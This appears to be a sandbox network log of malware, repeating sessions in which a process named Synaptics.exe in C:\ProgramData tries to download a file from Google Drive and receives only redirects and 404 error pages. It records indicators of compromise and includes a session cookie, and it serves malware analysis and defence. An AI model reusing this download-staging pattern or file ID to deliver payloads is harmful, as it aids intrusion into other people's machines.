                                                                                                                                                                    2024-12-30 03:59:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 53 61 54 51 35 6f 39 75 6a 55 4e 76 7a 31 51 2d 4a 5f 44 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="oSaTQ5o9ujUNvz1Q-J_Dvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    120192.168.2.449919142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:41 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6Y3g6nTdC_90wwTFlUzGeyiW_EWIlvUHK9oUwPShtsEkoRmh2o5u6JZoU7agqtEHPRupE7wl8
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dRvZgDaa8ncDK3lhuL4Etg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:41 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:41 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 35 61 70 64 59 48 4f 56 75 43 73 41 5a 6c 2d 36 78 53 6d 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="65apdYHOVuCsAZl-6xSmSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:41 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    121192.168.2.449921142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:42 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AtcnJdTZgXI1aOq-UyHpGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    122192.168.2.449922142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:42 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AZ6BYy9Kwgf11juDmWI9gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    123192.168.2.449923142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    124192.168.2.449924142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    125192.168.2.449928142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GRbQFVXDdgVQoYDVrl-UJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    126192.168.2.449929142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:43 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6UgqQLGk0pOkDiEQB7tGQfAtnR9Zrn-M0jz32kXc8TS-r-7w8W8WoC-5ZK6tHubqGjceBPNkE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-D_f3tEqjkMscKGBcSLhSLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 6f 42 35 77 45 39 54 4b 4c 2d 61 42 39 49 52 31 41 33 41 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="ioB5wE9TKL-aB9IR1A3AgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    127192.168.2.449931142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-acKrdUVhk3zLCwa70tgAkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    128192.168.2.449930142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:43 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Ng-uflHtoCJ-JOnCI818gn1ayzlH_BF1ZEO-y20tKgbTg73JkmBmuVRmo56yzlxKKD78WB1I
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
